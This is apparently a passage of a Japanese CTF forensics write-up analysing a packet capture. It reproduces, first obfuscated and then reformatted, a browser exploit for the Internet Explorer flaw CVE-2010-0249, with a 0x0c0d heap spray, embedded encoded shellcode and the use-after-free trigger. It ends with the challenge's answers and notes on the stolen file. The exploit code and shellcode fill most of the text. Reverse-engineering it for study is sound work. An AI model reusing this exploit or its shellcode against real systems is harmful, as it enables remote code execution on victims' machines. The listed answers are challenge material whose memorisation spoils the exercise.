u7315%u4f76%ub492%u8796%u11d6%u41e2%u7477%u352c%ubabf%u333f%u05fd%uf921%u7d04%u7e49%u1c70%u67be%ub9b7%uc101%uc0c7%u27e0%uf53b%u7a3c%u7143%u9b48%u4e75%u0d34%ue122%u4a4b%u919f%ud52b%u4779%ufc1a%ub042%u8d2f%ue338%u7c1d%u6678%ub225%u97b5%u2d93%ubb99%ua814%uf820%u0c7b%u8990%uebf7%ud469%ub324%u3d7f%u37b8%u767e%u7877%ub646%ua998%ub8b1%u7dbe%u9f42%ubf48%u709b%u0d79%ue186%u2775%u1424%u05b3%u6741%u497a%ubab6%u0a4f%u66fc%u933c%ub0b9%u408d%u8196%ud5d0%u902d%u98b1%u91a9%ud26b%u1de2%u9237%u9704%u037c%ue0d1%u4347%ub4b2%ud413%uf81b%ub799%u02a8%u0ce3%u3973%u0bfd%u4bf5%u85b5%u3deb%u1c7b%u717f%u3474%ud623%u803f%u72f9%u832f%u2ce3%u7cbb%u734e%ueb30%u7f25%u7646%u7115%u754a%u7435%u843f%ue1f5%ue218%ue028%u773c%u934a%u7bb8%ubf15%u2c79%u4070%u0db4%u7a4b%u9027%u4eba%u99b7%u2d72%u2f7d%u0867%u8df9%ufdb1%u3da8%u147e%u9b05%u98bb%u434f%u1078%u04f8%u1c34%ud51d%u4725%ub39f%u37b6%u4991%u4841%u4266%ub00c%ub592%ubeb9%u96a9%ufc12%ud3b2%u35d6%ud42a%u4624%ub897%u6588%ua2c2%uc3d9%u74d9%uf424%u335e%ub1c9%u314b%u1246%uc683%u0304%u6bce%u5720%ub74f%u6af0%uc7b0%u6205%u38c7%u73f6%ub1b7%u4213%ua6e5%uf750%uac39%uf435%ue0b2%u8fad%u2cb6%u38c1%u0b7c%ub9ec%u93b1%u7aa2%u6fd0%uaeb9%u5132%ua372%u9633%u4c6f%u4f61%ufffb%ue495%uc3b9%u2a94%u7cb6%u4fee%u0809%u5144%ua15a%u19d3%uc942%ub9bb%u1e73%u86d8%u2b3a%u7c2a%ufdbd%u7d63%uc18f%u402f%ucc3f%u842e%u2ff8%ufe45%ud2fa%uc55d%u0881%ud8e8%uda22%u394a%u0fd2%uca0c%ue4d8%u945b%ufbfc%uae88%u70f9%u612f%uc388%ua50b%u90d0%ufc32%u77bc%u1e4b%u2718%u54e9%u3c8b%u368b%uf1c4%uc8a1%u9e14%ubbb2%u0126%u5468%uca0b%ua3b6%ue16c%u3b0e%u0a93%u156e%u5e50%u0d3e%udf71%ucdd5%u0a7e%u9e79%ue5d0%u4e39%u5591%u84d1%u891e%ua6c1%ua2f4%u5c6b%u0c9f%u5fc3%ue55a%u6011%ua975%u869c%u411f%u11c8%uf888%ue951%u0429%u974c%u8e6a%u6762%u6724%u7b0f%u87d1%u215a%u9774%u4c71%u0d79%uc77d%ub92e%u3e7f%u6618%u1580%uaf12%ud614%ud04d%ud6f8%u868d%ud692%u7ee5%u84c6%u8110%ub8d3%u1488%ue8db%ube7d%u16b3%u885b%ue81c%u088e%u3f61%u8ef7%u3593%u531b');var OhBwxxFbfvufaEcywZSKmwvCtIbSVVoJhWUzbkcmgPgmEbPIAibShhC = IQSNXNdXQGOxdpUuDoqpVIdNrGmmMxrXDaDfjiYZSukWAquRUyCcLyYVjUgzercTIoRKxfLhwpAAIKEuehhwEJNoyvk( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" );do { OhBwxxFbfvufaEcywZSKmwvCtIbSVVoJhWUzbkcmgPgmEbPIAibShhC += OhBwxxFbfvufaEcywZSKmwvCtIbSVVoJhWUzbkcmgPgmEbPIAibShhC } while( OhBwxxFbfvufaEcywZSKmwvCtIbSVVoJhWUzbkcmgPgmEbPIAibShhC.length < 0xd0000 );for (qoCIjTeiFFnqXMptpGNLDkKTyYWFtgujt = 0; qoCIjTeiFFnqXMptpGNLDkKTyYWFtgujt < 150; qoCIjTeiFFnqXMptpGNLDkKTyYWFtgujt++) vIBRrlypWynOTPZhgXqEWZExqqLnyHNsOHQfdXaqjlybNsSEmGQRyIBTZT[qoCIjTeiFFnqXMptpGNLDkKTyYWFtgujt] = OhBwxxFbfvufaEcywZSKmwvCtIbSVVoJhWUzbkcmgPgmEbPIAibShhC + EURI;}function MAKCshNm(XSRhYfMvBfFbxlDiyjBApKkHjpVhRqfzKCPKCNH){IllnJDCFLXOzMWplbDudsPQJFPiSwnpSPlUhGLsdZhWSqtpqeuCOeYEG();pqmpDodBBlZeNpszilbaIYrlEEhJnrGtCUSYqOGbQfKpZFauVzPqSRBTHRomRReUJNOCDmznHHsusuGv = document.createEventObject(XSRhYfMvBfFbxlDiyjBApKkHjpVhRqfzKCPKCNH);document.getElementById("ILqhSVYCTPuMXyuIkXNJGtSiZFetXbaxyjQmTKbbjPjxVQlXPxLNTowWKpuHwMCPpOqCIpSJqRdMnpEMoWsZhNapeUmCrvMplm").innerHTML = "";window.setInterval(lkYYAsjOgRVzdPyazxKCcyPFS, 50);}function lkYYAsjOgRVzdPyazxKCcyPFS(){p = "\u0c0f\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";for (i = 0; i < NRRzUBcjspKOzBNKnOgXzqhcSFQRYAtTcBEKTsjPVSMMUvtYykTdBGHdWF.length; i++){NRRzUBcjspKOzBNKnOgXzqhcSFQRYAtTcBEKTsjPVSMMUvtYykTdBGHdWF[i].data = p;}var t = pqmpDodBBlZeNpszilbaIYrlEEhJnrGtCUSYqOGbQfKpZFauVzPqSRBTHRomRReUJNOCDmznHHsusuGv.srcElement;}

これを新しいファイルexploit.jsとして保存すると、アンチウイルスソフトが反応し、CVE-2010-0249*1脆弱性に対するexploitだということがわかりました。
整形してみると、

var comment = "COMMENT";
var array1 = new Array();
for ( i = 0 ; i < 1300 ; i++ ){
  array1[i] = document.createElement(comment);
  array1[i].data = "KFL";
}
var eventObject = null;
var array2 = new Array();
var funcUnescape = unescape;

function func1(){
  var EURI = funcUnescape( '%u909f%u980c%u157d%u4eb8%u467e%u4149%u083f%u93f5%u14bf%ufd13%u6742%u7147%u3d40%u739b%ub53c%u9192%u782f%u2474%u34b4%u8c48%u1dd6%u05b0%ue020%u7b7e%u3a78%uc6fe%ue1c1%ud432%u70b6%u6779%uba8d%ub490%ufc6b%u844f%u28d6%u96f9%u0c77%u7137%u9334%u2746%u2fa9%u73b2%u047f%u3d72%ufd1a%ua8b0%u8898%u15f5%ue322%u864b%u2df8%u6691%u47b7%u7c48%u1435%u117d%uebf7%u240d%ue201%u403f%u4e74%ub9b1%u3c49%u414a%u7a97%uf618%u92d5%ub5bb%u1d9b%u059f%ubf43%u76b3%u7525%u991c%ub8be%u2c42%u7f76%u7a41%ub31d%u2c77%u4948%u7d75%u7172%u734b%u1b27%u7bf5%u024e%u35e1%ue019%u1540%u7498%u3767%u99be%u7870%u0d4a%u2447%ub59b%u8046%u2dd5%u961c%u8993%ue2d2%ue321%u257c%ub8b2%u9f4f%u12b1%u0ceb%u92a8%u85b7%u7ed6%u143c%u34bf%ud181%ubaf9%u4204%u2fbb%u97a9%u8db4%u6691%ub905%ud42a%u383f%uc0ff%ub6fc%ufd2b%u3079%ub0f8%u9043%u7874%u7a7c%ub83d%u98a9%ub7b0%ue139%ud503%ud629%u4293%u96b2%ube34%u2f71%u727d%u900c%u4937%u2c79%ueb83%uf510%u27b5%ue309%u0577%u8c43%ufcd0%u1535%u928d%u484b%u29b1%u3fe0%u9966%u1441%ub324%u91b9%u97ba%u7b9b%u3275%ud4f6%u9f47%uf919%u31bb%ub6f8%ua825%u737e%u4e1c%u7f76%u2d0d%u7046%ufd3a%ubf40%u3db4%u3c1d%ue288%u0467%u4a4f%u7240%u7315%u4f76%ub492%u8796%u11d6%u41e2%u7477%u352c%ubabf%u333f%u05fd%uf921%u7d04%u7e49%u1c70%u67be%ub9b7%uc101%uc0c7%u27e0%uf53b%u7a3c%u7143%u9b48%u4e75%u0d34%ue122%u4a4b%u919f%ud52b%u4779%ufc1a%ub042%u8d2f%ue338%u7c1d%u6678%ub225%u97b5%u2d93%ubb99%ua814%uf820%u0c7b%u8990%uebf7%ud469%ub324%u3d7f%u37b8%u767e%u7877%ub646%ua998%ub8b1%u7dbe%u9f42%ubf48%u709b%u0d79%ue186%u2775%u1424%u05b3%u6741%u497a%ubab6%u0a4f%u66fc%u933c%ub0b9%u408d%u8196%ud5d0%u902d%u98b1%u91a9%ud26b%u1de2%u9237%u9704%u037c%ue0d1%u4347%ub4b2%ud413%uf81b%ub799%u02a8%u0ce3%u3973%u0bfd%u4bf5%u85b5%u3deb%u1c7b%u717f%u3474%ud623%u803f%u72f9%u832f%u2ce3%u7cbb%u734e%ueb30%u7f25%u7646%u7115%u754a%u7435%u843f%ue1f5%ue218%ue028%u773c%u934a%u7bb8%ubf15%u2c79%u4070%u0db4%u7a4b%u9027%u4eba%u99b7%u2d72%u2f7d%u0867%u8df9%ufdb1%u3da8%u147e%u9b05%u98bb%u434f%u1078%u04f8%u1c34%ud51d%u4725%ub39f%u37b6%u4991%u4841%u4266%ub00c%ub592%ubeb9%u96a9%ufc12%ud3b2%u35d6%ud42a%u4624%ub897%u6588%ua2c2%uc3d9%u74d9%uf424%u335e%ub1c9%u314b%u1246%uc683%u0304%u6bce%u5720%ub74f%u6af0%uc7b0%u6205%u38c7%u73f6%ub1b7%u4213%ua6e5%uf750%uac39%uf435%ue0b2%u8fad%u2cb6%u38c1%u0b7c%ub9ec%u93b1%u7aa2%u6fd0%uaeb9%u5132%ua372%u9633%u4c6f%u4f61%ufffb%ue495%uc3b9%u2a94%u7cb6%u4fee%u0809%u5144%ua15a%u19d3%uc942%ub9bb%u1e73%u86d8%u2b3a%u7c2a%ufdbd%u7d63%uc18f%u402f%ucc3f%u842e%u2ff8%ufe45%ud2fa%uc55d%u0881%ud8e8%uda22%u394a%u0fd2%uca0c%ue4d8%u945b%ufbfc%uae88%u70f9%u612f%uc388%ua50b%u90d0%ufc32%u77bc%u1e4b%u2718%u54e9%u3c8b%u368b%uf1c4%uc8a1%u9e14%ubbb2%u0126%u5468%uca0b%ua3b6%ue16c%u3b0e%u0a93%u156e%u5e50%u0d3e%udf71%ucdd5%u0a7e%u9e79%ue5d0%u4e39%u5591%u84d1%u891e%ua6c1%ua2f4%u5c6b%u0c9f%u5fc3%ue55a%u6011%ua975%u869c%u411f%u11c8%uf888%ue951%u0429%u974c%u8e6a%u6762%u6724%u7b0f%u87d1%u215a%u9774%u4c71%u0d79%uc77d%ub92e%u3e7f%u6618%u1580%uaf12%ud614%ud04d%ud6f8%u868d%ud692%u7ee5%u84c6%u8110%ub8d3%u1488%ue8db%ube7d%u16b3%u885b%ue81c%u088e%u3f61%u8ef7%u3593%u531b');
  var bin0C0D = funcUnescape( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" );
  do {
    bin0C0D += bin0C0D
  } while( bin0C0D.length < 0xd0000 );
  for ( i = 0 ; i < 150 ; i++ )
    array2[i] = bin0C0D + EURI;
}

function MAKCshNm(XSRhYfMvBfFbxlDiyjBApKkHjpVhRqfzKCPKCNH){
  func1();
  eventObject = document.createEventObject(XSRhYfMvBfFbxlDiyjBApKkHjpVhRqfzKCPKCNH);
  document.getElementById("ILqhSVYCTPuMXyuIkXNJGtSiZFetXbaxyjQmTKbbjPjxVQlXPxLNTowWKpuHwMCPpOqCIpSJqRdMnpEMoWsZhNapeUmCrvMplm").innerHTML = "";
  window.setInterval(lkYYAsjOgRVzdPyazxKCcyPFS, 50);
}

function func2(){
  p = "\u0c0f\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";
  for (i = 0; i < array1.length; i++){
    array1[i].data = p;
  }
  var t = eventObject.srcElement;
}

といった感じです。

まとめ

To try this challenge on your own, download the packet capture, study it, and try to answer the following questions:
Which IP addresses were involved?
  192.168.1.5
  192.168.1.50
What URL(s) was (were) requested?
  http://192.168.1.5/zezevAs9up49EdRema/
What exploit was used?
  CVE-2010-0249
What information was taken?
  c:\windows\temp\T0ps3(r3t.txt

追記

> file T0ps3(r3t.txt
T0ps3(r3t.txt; data

@ucq T0ps3(r3t.txtについて 見た感じエントロピーは高め。00がない。ファイルサイズが中途半端なので現代暗号っぽくない。2*83*167。 166*167なのでなんかいい感じ

T0ps3(r3t.txt(27,722 バイト)のビットマップイメージ

pcapファイルのビットマップイメージ

*1:VirusTotalの結果を見ると、CVE-2010-0247も出てくる